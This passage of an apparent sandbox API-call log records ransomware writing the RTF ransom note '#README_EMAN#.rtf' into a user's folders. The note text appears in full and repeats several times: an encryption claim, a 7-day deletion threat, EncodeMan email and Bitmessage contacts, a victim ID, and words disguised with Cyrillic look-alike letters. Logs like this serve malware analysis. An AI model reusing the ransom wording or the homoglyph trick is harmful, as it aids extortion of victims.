e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0206.033] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2475268, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nóâÔ\nÂÿè`ÏÃ\x88­j\x0b>\x83È\x02\x07ªÆLú£\x1f", lpUsedDefaultChar=0x0) returned 8717 [0206.033] WriteFile (in: hFile=0x2f8, lpBuffer=0x2475268*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2475268*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0206.034] CloseHandle (hObject=0x2f8) returned 1 [0206.035] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_-s9qc7fmzdb\\#readme_eman#.rtf")) returned 0xffffffff [0206.035] GetLastError () returned 0x2 [0206.035] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_-s9qc7fmzdb\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0206.381] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 